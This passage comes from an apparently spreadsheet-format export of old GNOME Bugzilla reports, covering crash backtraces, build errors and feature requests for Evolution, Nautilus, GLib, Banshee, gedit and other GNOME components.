#15 0x4043dd74 in e_book_listener_check_queue (listener=0x81223f8)
    at e-book-listener.c:105
#16 0x40aa3f10 in g_timeout_dispatch (source_data=0x8179868 
    dispatch_time=0xbffff7e0 user_data=0x81223f8) at gmain.c:1302
#17 0x40aa3055 in g_main_dispatch (dispatch_time=0xbffff7e0) at gmain.c:656
#18 0x40aa3659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#19 0x40aa37e8 in g_main_run (loop=0x80fce88) at gmain.c:935
#20 0x409777f7 in gtk_main () at gtkmain.c:524
#21 0x4034565f in bonobo_main () at bonobo-main.c:283
I realize that the code is hanging in the ORBit code so it may not 
necessarily be directly an evo bug but it makes using the addressbook on 
my laptop (which goes on and off the network quite often) rather 
frustrating :-(
I'm an complete ORBIT novice so the following may or may not be 
accurate.  My debugging revealed that the process is hung on a select 
which is waiting for only UNIX domain sockets.  I can't seem to understand 
why that would get affected by the network interface being up or down.  Of 
course it is possible that the addressbook component is hung waiting from 
a response from the wombat component which in turn doesn't have a response 
back from the LDAP server because of the network being down.
An unrelated LDAP bug that shows up sometimes when I shut down the network 
interface and bring it back up on a different network is that evo fails to 
authenticate and bind properly to my LDAP server.  My LDAP server is 
configured to return only one record (the auth record) in anonymous mode.  
Sometimes after the connection to the LDAP server dies and is restarted by 
evo it binds as if in anonymous mode and then can only retrieve the auth 
record from the server.  The only way I can find to get out of this wedged 
state is to shut down evo and restart.</t>
  </si>
  <si>
    <t>GEDIT-52201</t>
  </si>
  <si>
    <t>(gedit Crash at 193.153.0.179)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gedit
Version: 0.7.0
Severity: 
&gt;Synopsis: 
&gt;Class: sw-bug
System: Gdk-CRITICAL
&gt;Description:
gedit index.html (for exemple index of www.elperiodico.com)
gedit index
Gdk-CRITICAL **: file gdkwindow.c: line 1390 (gdk_window_get_size): assertion `window != NULL' failed.
&gt;How-To-Repeat:
Open gedit with a page with java
to select for copy in this page and paste in 
new page it doesn't paste anything. Then return to copy index 
at the first gedit with 'index' and again select
text for copy on open window error.
arusha
login@the-any-key.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-16 19:20 -------
The original reporter (login@the-any-key.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component chema@celorio.com.
</t>
  </si>
  <si>
    <t>login</t>
  </si>
  <si>
    <t>GNOME-APPLETS-57352</t>
  </si>
  <si>
    <t>gnome-appletts are not able to load CORBA</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Severity: critical
Version: 1.4.0.1
Synopsis: gnome-appletts are not able to load CORBA
Bugzilla-Product: gnome-applets
Bugzilla-Component: cpumemusage
Description:
I installed the most new SuSE-rpms (july-01) of GNOME-1.4 eel-1.0.1 and librsvg-1.0.1. All applications of GNOME wrer running fine.
Than I compiled and installaed nautilus-1.0.4:
Now the applet cpumemusage say could not load CORBA and exits. So are the other applets!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-10 16:24 -------
The original reporter (ml@viererbande.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ml</t>
  </si>
  <si>
    <t>GNOME-APPLETS-90090</t>
  </si>
  <si>
    <t>Disk Mounter (drivemount)</t>
  </si>
  <si>
    <t>too large on vertical panel with 'Scale size to panel'</t>
  </si>
  <si>
    <t>When the applet is on a vertical panel and I choose 'Scale size to panel'
in the preferences the applet button is not resized to the width of the
panel. Instead the width of the image inside the button is resized to the
width of the panel.</t>
  </si>
  <si>
    <t>tspiteri</t>
  </si>
  <si>
    <t>GNOME-PYTHON-DESKTOP-516788</t>
  </si>
  <si>
    <t>gnomekeyring: find_network_password_sync returns None instead of results</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/463644 by Justin Mazzola Paluska ]
The find_network_password_sync function of the gnomekeyring module
constructs when it finds a match returns None instead of the matches
it should return.  (See bug #463494 for what it does with no match.)
This is silly because it even constructs the list of matches in
Python!</t>
  </si>
  <si>
    <t>BANSHEE-329812</t>
  </si>
  <si>
    <t>Not able to browse Rhythmbox DAAP share</t>
  </si>
  <si>
    <t>I am able to see that there is a DAAP share from RB but the playlist never gets populated. The other way around the playlist do get populated but it is not possible to actually play anything on the list. 
Using GStreamer 0.10
Connecting to DAAP share: 192.168.1.221:3689 (Jan Rules!)
Unhandled Exception: DAAP.LoginException: Failed to login ---&gt; DAAP.ContentException: Failed to find content code for: 1835822951
in [0x0020e] DAAP.ContentParser:Parse (DAAP.ContentCodeBag bag System.Byte[] buffer System.String root System.Int32 offset)
in [0x00007] (at /home/cschalle/RPMS/BUILD/banshee-0.10.4/src/Banshee.Plugins/Daap/daap-sharp/ContentParser.cs:176) DAAP.ContentParser:Parse (DAAP.ContentCodeBag bag System.Byte[] buffer System.String root)
in [0x00003] (at /home/cschalle/RPMS/BUILD/banshee-0.10.4/src/Banshee.Plugins/Daap/daap-sharp/ContentParser.cs:180) DAAP.ContentParser:Parse (DAAP.ContentCodeBag bag System.Byte[] buffer)
in [0x00049] (at /home/cschalle/RPMS/BUILD/banshee-0.10.4/src/Banshee.Plugins/Daap/daap-sharp/Client.cs:125) DAAP.Client:Login (System.String username System.String password)--- End of inner exception stack trace ---
in [0x000ec] (at /home/cschalle/RPMS/BUILD/banshee-0.10.4/src/Banshee.Plugins/Daap/daap-sharp/Client.cs:143) DAAP.Client:Login (System.String username System.String password)
in [0x00003] (at /home/cschalle/RPMS/BUILD/banshee-0.10.4/src/Banshee.Plugins/Daap/daap-sharp/Client.cs:111) DAAP.Client:Login ()
in  Banshee.Plugins.Daap.DaapSource+AnonHelp:1 ()
in (wrapper delegate-invoke) System.MulticastDelegate:invoke_void ()
Starting DAAP Server</t>
  </si>
  <si>
    <t>GIMP-419290</t>
  </si>
  <si>
    <t>Area vs length-scaling for the Scale-scale of brushes</t>
  </si>
  <si>
    <t>The Scale scale for brushes currently denotes the area scaling. A Scale of 9.00 means that a circular brush will have its diameter increased with a factor of sqrt(9.00) = 3.00.
This is confusing for users since the common brushes are measured in length-scales diameter for the normal brushes e.g Circle (7) Circle Fuzzy (13) etc and radius for VBR brushes.
A user who uses Circle (11) and scales with a factor of 4 will not get Circle (44) but Circle (22).
We should come to a conclusion and and solution before 2.4 here.</t>
  </si>
  <si>
    <t>enselic</t>
  </si>
  <si>
    <t>NAUTILUS-41007</t>
  </si>
  <si>
    <t>Should show program match quality in Open With dialog</t>
  </si>
  <si>
    <t xml:space="preserve">BeOS has a feature in their Open With dialog where the available programs are
sorted by match quality (they call it Relation). The default for the given
type is first followed by the ones that handle that type specifically the ones
that handle the supertype (e.g. text/*) and finally the ones that handle any
type. There's a column (that you can sort by) that describes this in text like
Preferred for MPEG audio Handles MPEG audio Handles any audio Handles
any file. This is a pretty cool feature if you have support for such things
which I don't think we do yet (our applications don't know squat about what they
can handle I think).
------- Additional Comments From sullivan@eazel.com 2000-05-30 12:48:45 ----
I'm not completely sure this is feasible but it seems like a good idea if it is.
------- Additional Comments From eli@eazel.com 2000-10-16 19:34:43 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-51301</t>
  </si>
  <si>
    <t>Recently added bugs dissappear due to 'invisible bit' being set</t>
  </si>
  <si>
    <t>When submitting recent (gtk+) bug reports the reports no longer show up in
My bugs approximately a day after submission. I spoke to Havoc about this
and he said it was something to do with the invisible bit getting set so
that only the bug owner can see the report in the database.
This may be by design I don't know but personally I think this is a very
Bad Thing - I like/need to be able to keep track of the bugs &amp; patches I've
submitted so I can see what has been applied.</t>
  </si>
  <si>
    <t>lee0</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-433967</t>
  </si>
  <si>
    <t>make distcheck fails</t>
  </si>
  <si>
    <t>Evolution-Exchange does not pass make distcheck.
This one is easy.  make clean does not remove a schema file.</t>
  </si>
  <si>
    <t>NAUTILUS-41928</t>
  </si>
  <si>
    <t>DEMO: add uri redirect fixes to demo branch</t>
  </si>
  <si>
    <t xml:space="preserve">We need to point startup login install to the correct machine.  Also need to
add the uri redirect hack and white title text hack after we branch.
------- Additional Comments From pepper@eazel.com 2000-09-07 17:19:09 ----
This was a demo bug that somehow slipped into the usable milestone.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:28:40 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:04:46 ----
Batch-assigning QA ownership of Services bugs to Albert.
------- Additional Comments From pepper@eazel.com 2000-10-31 15:52:24 ----
batch moving to summary component since the startup component is now gone and
confusing when creating new bugs.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
The original reporter (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
The original owner (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-439146</t>
  </si>
  <si>
    <t>Don't flash the notification area icon</t>
  </si>
  <si>
    <t>The tray icon plugin flashes when mail arrives which is terribly annoying when I know I have a mail in my inbox (because a notification popped up) but will deal with it in a few minutes time.
Please don't make the icon flash it appearing is enough.</t>
  </si>
  <si>
    <t>EVOLUTION-205344</t>
  </si>
  <si>
    <t>cities in weather dialoge for Europe/Germany</t>
  </si>
  <si>
    <t>in MyWeather you have left out the whole eastern-germany in
Europe/Germany. If you need some bigger cities :
  Leipzig (thats where I live 0.5 million inhabitants south-east)
  Dresden (more south-east)
  Rostock (north)
this selection should cover the area fairly well.</t>
  </si>
  <si>
    <t>s.kost</t>
  </si>
  <si>
    <t>TOMBOY-308867</t>
  </si>
  <si>
    <t>tomboy crashes with 'Directory does not exists' error</t>
  </si>
  <si>
    <t>Version details: CVS
Distribution/Version: FC4
I built tomboy from CVS (gnome anoncvs 2005.06.23) and mono-1.8.1.1-1. The
built went fine but when I ran mono Tomboy.exe I got this error:
Unhandled Exception: System.ArgumentException: Directory does not exists
Parameter name: path
in  System.IO.FileSystemWatcher:.ctor (System.String path
System.String filter)
in (wrapper remoting-invoke-with-check) System.IO.FileSystemWatcher:.ctor
(stringstring)
in  Tomboy.PluginManager:.ctor (System.String plugins_dir)
in  Tomboy.NoteManager:.ctor (System.String directory System.String
backup_directory)
in  Tomboy.NoteManager:.ctor (System.String directory)
in  Tomboy.NoteManager:.ctor ()
in  Tomboy.TomboyTrayIcon:.ctor ()
in  Tomboy.Tomboy:StartTrayIcon ()
in  Tomboy.Tomboy:Main (System.String[] args)
My system is FC4. This error crashes tomboy as nothing appears in the system tray.</t>
  </si>
  <si>
    <t>sig</t>
  </si>
  <si>
    <t>NAUTILUS-83702</t>
  </si>
  <si>
    <t>Dnd of apps on desktop is of no use.</t>
  </si>
  <si>
    <t>Using build of 29th may on Solaris.
Drag the application say gedit from the menus to the desktop.
It appears as gedit.desktop on the desktop.
On double click that application is suppose to launch. 
But instead of application I get a kind of error window: 
Can't Display Location
Nautilus has no installed viewer capable of displaying
applications:///Accesories/gedit.desktop.</t>
  </si>
  <si>
    <t>Kalpesh.Shah</t>
  </si>
  <si>
    <t>GLIB-59659</t>
  </si>
  <si>
    <t>g_filename_to_uri and g_filename_from_uri not sufficient for handling URIs in drag code</t>
  </si>
  <si>
    <t>The two calls g_filename_to_uri and g_filename_from_uri were added to
make it easy to manipulate URIs in drag and drop code for moving and
copying files. Unfortunately they do not provide a simple interface to
what's needed in such code.
The receiving end needs to not only parse out the filename and host
from the URI but also check that the host is either NULL  localhost
or a name for the local host.
The sending end needs to not only make a URI out of the filename but
also encode the name for the local host.
We need convenience functions for both of these for GNOME 2. If we don't
have them in GLib we'll have to put them in some other GNOME platform
library or worse we'll have to put them multiple places perhaps in
eel for instance.
I guess it's too late to do anything about this for glib 2.0 -- bummer.</t>
  </si>
  <si>
    <t>NAUTILUS-70193</t>
  </si>
  <si>
    <t>Nautilus crashes when 8-bit visual depth is set</t>
  </si>
  <si>
    <t>Running Nautilus on an 8-bit graphics card or on a graphics card with 8 bit
default visuals causes Nautilus to crash with:
nautilus (pid:4300): Gdk-ERROR **: The program 'nautilus' received an X
Window System error.
This probably reflects a bug in the program.
The error was 'BadMatch (invalid parameter attributes)'.
  (Details: serial 9706 error_code 8 request_code 2 minor_code 0)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error()
function.)
aborting...
Trace/Breakpoint Trap(coredump)
traceback follows core is also available if necessary:
#0  0xfda1c670 in _lwp_kill () from /usr/lib/libc.so.1
#1  0xfd9cb8b4 in raise () from /usr/lib/libc.so.1
#2  0xfdbee970 in g_logv () from /opt/gnome-2.0/lib/libglib-1.3.so.12
#3  0xfdbeeaac in g_log () from /opt/gnome-2.0/lib/libglib-1.3.so.12
#4  0xfdf76b08 in gdk_x_error () from
/opt/gnome-2.0/lib/libgdk-x11-1.3.so.12
#5  0xfec49cd4 in bonobo_x_error_handler ()
   from /opt/gnome-2.0/lib/libbonoboui-2.so.0
#6  0xfde3c344 in _XError () from /usr/lib/libX11.so.4
#7  0xfde1c740 in _XReply () from /usr/lib/libX11.so.4
#8  0xfde236b4 in XSync () from /usr/lib/libX11.so.4
#9  0xfde4ddd0 in _XSyncFunction () from /usr/lib/libX11.so.4
#10 0x78d0c in set_gdk_window_background ()
#11 0x78fd0 in set_window_background ()
#12 0x7920c in map ()
#13 0xfdcc8808 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#14 0xfdca29c0 in g_type_class_meta_marshal ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#15 0xfdca245c in g_closure_invoke ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#16 0xfdcc7670 in signal_emit_unlocked_R ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#17 0xfdcc66fc in g_signal_emit_valist ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#18 0xfe2200cc in gtk_signal_emit ()
   from /opt/gnome-2.0/lib/libgtk-x11-1.3.so.12
#19 0xfe335950 in gtk_widget_map ()
   from /opt/gnome-2.0/lib/libgtk-x11-1.3.so.12
#20 0xfe34fc3c in gtk_window_show ()
   from /opt/gnome-2.0/lib/libgtk-x11-1.3.so.12
#21 0xb0eb0 in nautilus_window_show ()
#22 0xfdcc8808 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#23 0xfdca29c0 in g_type_class_meta_marshal ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#24 0xfdca245c in g_closure_invoke ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#25 0xfdcc7670 in signal_emit_unlocked_R ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#26 0xfdcc66fc in g_signal_emit_valist ()
   from /opt/gnome-2.0/lib/libgobject-1.3.so.12
#27 0xfe2200cc in gtk_signal_emit ()
   from /opt/gnome-2.0/lib/libgtk-x11-1.3.so.12
#28 0xfe334bfc in gtk_widget_show ()
   from /opt/gnome-2.0/lib/libgtk-x11-1.3.so.12
#29 0x78b90 in nautilus_desktop_window_new ()
#30 0x70274 in nautilus_application_create_desktop_window ()
#31 0x702f0 in nautilus_application_open_desktop ()
#32 0x87c84 in corba_start_desktop ()
#33 0x6b3c4 in Nautilus_Shell_start_desktop ()
#34 0x6fff8 in nautilus_application_startup ()
#35 0x7b894 in main ()</t>
  </si>
  <si>
    <t>LIBEGG-132830</t>
  </si>
  <si>
    <t>toolbar</t>
  </si>
  <si>
    <t>LIBEGG</t>
  </si>
  <si>
    <t>libegg has compilation problems.</t>
  </si>
  <si>
    <t>libegg (HEAD) failed to compile giving following errors:-
test-toolbar.c: In function `set_toolbar_style_toggled':
test-toolbar.c:73: warning: implicit declaration of function
`gtk_option_menu_get_history'
test-toolbar.c:73: warning: implicit declaration of function `GTK_OPTION_MENU'
test-toolbar.c: At top level:
test-toolbar.c:321: parse error before `*'
test-toolbar.c: In function `icon_size_history_changed':
test-toolbar.c:325: `menu' undeclared (first use in this function)
test-toolbar.c:325: (Each undeclared identifier is reported only once
test-toolbar.c:325: for each function it appears in.)
test-toolbar.c:328: `toolbar' undeclared (first use in this function)
test-toolbar.c: In function `main':
test-toolbar.c:404: warning: implicit declaration of function
`gtk_option_menu_new'
test-toolbar.c:404: warning: assignment makes pointer from integer without
a cast
test-toolbar.c:417: warning: implicit declaration of function
`gtk_option_menu_set_menu'
test-toolbar.c:418: warning: implicit declaration of function
`gtk_option_menu_set_history'
test-toolbar.c:428: warning: assignment makes pointer from integer without
a cast
. . .
lude -Wall -Wp-MD.deps/eggsidebarbutton.pp -c eggsidebarbutton.c  -fPIC
-DPIC -o .libs/eggsidebarbutton.o
eggsidebarbutton.c:89: parse error before `GtkItemFactory'
eggsidebarbutton.c:89: warning: no semicolon at end of struct or union
eggsidebarbutton.c:101: parse error before `}'
eggsidebarbutton.c: In function `egg_sidebar_button_init':
eggsidebarbutton.c:227: syntax error before `popup_menu_items'
eggsidebarbutton.c:225: warning: unused variable `black'
eggsidebarbutton.c:224: warning: unused variable `dnd_border_ebox'
eggsidebarbutton.c:224: warning: unused variable `dnd_vbox'
eggsidebarbutton.c:224: warning: unused variable `dnd_ebox'
eggsidebarbutton.c: At top level:
eggsidebarbutton.c:238: parse error before `-&gt;'
eggsidebarbutton.c:240: parse error before `('
eggsidebarbutton.c:241: parse error before `('
eggsidebarbutton.c:247: parse error before `('
eggsidebarbutton.c:255: parse error before `('
eggsidebarbutton.c:256: parse error before `('
eggsidebarbutton.c:257: parse error before `('
eggsidebarbutton.c:258: parse error before `('
eggsidebarbutton.c:266: parse error before `('
eggsidebarbutton.c:268: parse error before `-&gt;'
. . .</t>
  </si>
  <si>
    <t>kaushalkumar1</t>
  </si>
  <si>
    <t>LIBGWEATHER-527594</t>
  </si>
  <si>
    <t>Merge location and city when there's only one location in the city</t>
  </si>
  <si>
    <t>GALEON-168181</t>
  </si>
  <si>
    <t>Saving images with File &gt; Save as causes an error message to be saved</t>
  </si>
  <si>
    <t>Version details: Debian's 1.3.19-4
Distribution/Version: Debian/sid
Hi
If you view an image with Galeon (and only an image) that is an image is in the
URL bar using Save as... from the file menu will save an error page in HTML
format instead of the image.
The content of the file is:
&lt;base
href=http://bugzilla.gnome.org/images/gnome-64.png&gt;&lt;img alt=The
image http://bugzilla.gnome.org/images/gnome-64.png cannot be
displayed because it contains errors.
src=http://bugzilla.gnome.org/images/gnome-64.png&gt;
This is Debian bug  I couldn't find a similar
bug in the BTS.
Bye</t>
  </si>
  <si>
    <t>NAUTILUS-96512</t>
  </si>
  <si>
    <t>crashes when copying a directory</t>
  </si>
  <si>
    <t>Description of Problem:
Trying to do a backup of a windows drive I have to
wipe out I get a nautilus crash when I try to
copy the My Documents folder.
Steps to reproduce the problem:
1. Open a nautilus window and go to /mnt
2. Drag Mis Documentos to a VÃ­as folder in the
desktop.
Actual Results:
Nautilus crashes when trying to copy some file I
can't see which.
Expected Results:
Well the copy operation should ifnish...
How often does this happen? 
Always.
Additional Information:
I'll attach the output of find on that
directory. Some file in there (one of the first it
tries to copy) makes it crash.</t>
  </si>
  <si>
    <t>EVOLUTION-206387</t>
  </si>
  <si>
    <t>Send/Receive button in mail program</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: Send/Receive button in mail program
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Hi
We write email GPL software. Some anti-relaying programs require
the user to Receive before sending. Could you add a way to 
change the Send/Receive to Receive/Send?
The anti-relaying is called Authenticate before Relay.
If the user receives before sending the receive will authenticate
them. Then the send will be accepted since they authenticated.
With Send/Receive thier first send will be rejected for relay
and then thier receive will authenticate. Backwards.
So if there was a button or switch or something that would allow
the user to Receive/Send or Send/Receive then we can recommend
Evolution as a replacement for OutLook or any other Mail User Agent.
Thanks :)
Ken Jones
http://www.inter7.com/devel/ - list of GPL projects
Unknown reporter: kbo-evolution@inter7.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>kbo-evolution</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-354923</t>
  </si>
  <si>
    <t>Evolution does not store protocol in keyring entries</t>
  </si>
  <si>
    <t>Please describe the problem:
I have one account which uses SMTP AUTH for sending mail. Everytime I send mail the Authentication Dialog pops up and asks for the SMTP AUTH Password after entering the correct password everything works fine.
This could be happening because the SMTP Server runs on a different port: 8025
So my SMTP Server is configured as:
mail.server.com:8025
I'll attach a screenshot of the keyring.
Steps to reproduce:
1. Configure a SMTP Server using SMTP Auth
2. Send a mail
3. Authentication dialog pops up you can save the password but it's not remembered for the next session
Actual results:
Authentication dialog pops up every evolution session
Expected results:
The mail should be sent right away using the credentials stored in gnome-keyring-manager
Does this happen every time?
yes ervery new evo session
Other information:</t>
  </si>
  <si>
    <t>ORCA-472029</t>
  </si>
  <si>
    <t>Cannot arrow into autocompletes in HTML forms if Orca is controlling the caret</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Locate an entry in a form which you have previously used (e.g. Google search entry).
2. Type a letter or two that matches a value you had typed in that entry before (old search term).  At this point an autocomplete will appear beneath the entry.  If Orca is controlling the caret you cannot arrow into it if Gecko is you can.</t>
  </si>
  <si>
    <t>GNOME-PRINT-61812</t>
  </si>
  <si>
    <t>1) printing to a file doesn't print it if no path is given 2) no Browse button in printing dialog</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-print
Severity: blocker
Version: 0.15
Synopsis: 1) printing to a file doesn't print it if no path is given 2) no Browse button in printing dialog
Bugzilla-Product: gnome-print
Bugzilla-Component: general
Description:
1) Printing to a file in the printing dialog doesn't generate a file if
the filename is given without a path.
2) No Browse... button is in the printing dialog.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-05 15:49 -------
The original reporter (Johann.Glaser@gmx.at) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component lauris@ximian.com.
</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-330807</t>
  </si>
  <si>
    <t>History dropdown should be sorted according to panel direction</t>
  </si>
  <si>
    <t>Please describe the problem:
The history dropdown list should be sorted latest first according to panel
direction.
The last history item should be nearest the panel.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>hc.brugmans</t>
  </si>
  <si>
    <t>GTK+-50294</t>
  </si>
  <si>
    <t>GdkRGB uses too many colors on 8-bit</t>
  </si>
  <si>
    <t>GdkRGB tries to allocate 216 colors on an 8-bit display which is probably
kind of bad citizenship. Should perhaps have an environment variable or X
property that affects this. Otherwise just do a smaller cube by default on
8-bit. Remember to get XlibRGB as well in contrib/</t>
  </si>
  <si>
    <t>GLIB-99294</t>
  </si>
  <si>
    <t>Two bugs in g_cond_timed_wait_win32_impl</t>
  </si>
  <si>
    <t>There are two bugs in this function.  First calling
g_cond_timed_wait(c m NULL)
is supposed to be equivalent to callling
g_cond_wait(c m)
The implementation assumes abs_time != NULL which causes a core dump.  
Second g_cond_time_wait never checks to see if specified timeout is in 
the past.
This second bug is actually potentially severe.  If you have code that 
gets the current time of day and adds a few milliseconds to this time (to 
specify the timeout for g_cond_timed_wait) it's possible for the thread 
to exhaust its time slice and not be scheduled until such time as this 
timeout is in the future causing an unexpected lengthy delay.
Here is the version that I just wrote which should fix both problems:
static gboolean
g_cond_timed_wait_win32_impl (GCond *cond
                              GMutex *entered_mutex
                              GTimeVal *abs_time)
{
  GTimeVal current_time
  gulong to_wait
  if (! abs_time)
    return g_cond_wait_win32_impl
  g_return_val_if_fail (cond != NULL FALSE)
  g_return_val_if_fail (entered_mutex != NULL FALSE)
  g_get_current_time (
  if (abs_time-&gt;tv_sec &gt; current_time.tv_sec ||
      (abs_time-&gt;tv_sec == current_time.tv_sec &amp;&amp;
          abs_time-&gt;tv_usec &gt;= current_time-&gt;tv_usec))
    {
      to_wait = 0
    }
  else
    to_wait = (abs_time-&gt;tv_sec - current_time.tv_sec) * 1000 +
      (abs_time-&gt;tv_usec - current_time.tv_usec) / 1000
  return g_cond_wait_internal (cond entered_mutex to_wait)
}</t>
  </si>
  <si>
    <t>GTRANSLATOR-514816</t>
  </si>
  <si>
    <t>GTRANSLATOR</t>
  </si>
  <si>
    <t>GtkBuilder instead of libglade</t>
  </si>
  <si>
    <t>We should use the new xml system Gtkbuilder instead of libglade. But maybe we should wait until glade 3 supports GtkBuilder.</t>
  </si>
  <si>
    <t>gtranslator-maint</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-314346</t>
  </si>
  <si>
    <t>Clicking add wallpaper  File System icon and Pathbar are bigger than the others gtk2 program on gtkfilechooer.</t>
  </si>
  <si>
    <t>Please describe the problem:
Clicking add wallpaper  File System icon and Pathbar are bigger than the
others gtk2 programs on gtkfilechooer.
Steps to reproduce:
1. Execute gnome-background-properties
2. Click add wallpaper
3. 
Actual results:
Expected results:
Does this happen every time?
always
Other information:
gnome-icon-theme-2.11.92 gtk+ 2.8.0 control-center 2.11.91</t>
  </si>
  <si>
    <t>sangu.gnome</t>
  </si>
  <si>
    <t>GSTREAMER-352476</t>
  </si>
  <si>
    <t>[wavpack] documentation unit tests memleak fix</t>
  </si>
  <si>
    <t>Hi
the attached patches add 3 unit test suites for all 3 wavpack elements documentation for them and a fix for a memleak that showed up while creating the unit tests.
Bye</t>
  </si>
  <si>
    <t>NAUTILUS-90151</t>
  </si>
  <si>
    <t>Support standard text entry operations (copy paste etc.) in rename box</t>
  </si>
  <si>
    <t>Maybe make the rename box more like GtkEntry with cut/copy/paste
and the right-click menu etc.
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=70685</t>
  </si>
  <si>
    <t>VTE-111430</t>
  </si>
  <si>
    <t>bold text doesn't seem to work</t>
  </si>
  <si>
    <t>Bold text does not work with any kind of font (I usually use bitmap but I
have tried scalable too) with VTE 0.11.x including 0.11.3.
Thanks! Interesting to see VTE linking with GL libraries now. -)</t>
  </si>
  <si>
    <t>MUINE-400206</t>
  </si>
  <si>
    <t>does not build with flac 1.1.3</t>
  </si>
  <si>
    <t>Muine does not build with the current version of libflac.</t>
  </si>
  <si>
    <t>AT-SPI-521667</t>
  </si>
  <si>
    <t>compile errors</t>
  </si>
  <si>
    <t>The following patch fixes several C99 idioms that lead to compilation errors with older compilers like gcc 2.x. It also removes a few unused variables.</t>
  </si>
  <si>
    <t>RHYTHMBOX-336748</t>
  </si>
  <si>
    <t>maybe use italic for artist and album markup</t>
  </si>
  <si>
    <t>I have two doubts about using underline markup for the artist and album in the header:
  * might be confused for a link - especially since it used to be
  * adds a bit more visual noise - especially since we have a few horizontal lines right below it
I'll attach screenshots for comparison.</t>
  </si>
  <si>
    <t>GNOME-UTILS-134936</t>
  </si>
  <si>
    <t>screen reader do not  read the dictionary  accessible lable</t>
  </si>
  <si>
    <t>screen reader do not read the dictionary accessible lable duting forward 
navigation. Duting forward navigation it reads it as â€œ simple line 
text  . But duting  backward navigation screen reader reads it as â€œ 
dictionary â€œ.
Expected:
Screen reader should read  the applet on panel when focus moved from 
forward or backward.
steps:
1. start gnopernicus &amp; wait till you hear the speech.
2. add dictionay applet to panel.
43. move the focus on dictionary from left using tab key
5. Now. screen reader reads it as   simple line text 
6. Now move the focus on dictionary applet from right using key 
navigation. i.e press key shift + tab 
7. Now screen reader reads it as dictionary.</t>
  </si>
  <si>
    <t>chandrashekhar.korlahalli</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-504875</t>
  </si>
  <si>
    <t>crash in Deskbar: after beagle update to 0...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
after beagle update to 0.3.1 beagle-live.py crashes
Distribution: Debian lenny/sid
Gnome Release: 2.20.2 2007-11-29 (Debian)
BugBuddy Version: 2.20.1
System: Linux 2.6.22-3-686 #1 SMP Mon Nov 12 08:32:57 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: Tango
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (164 sec old) ---------------------
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAlbums' to action group 'StaticPlaylistActions'
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchTitles' to action group 'StaticPlaylistActions'
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAll' to action group 'StaticPlaylistActions'
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchArtists' to action group 'StaticPlaylistActions'
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAlbums' to action group 'StaticPlaylistActions'
(rhythmbox:30696): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchTitles' to action group 'StaticPlaylistActions'
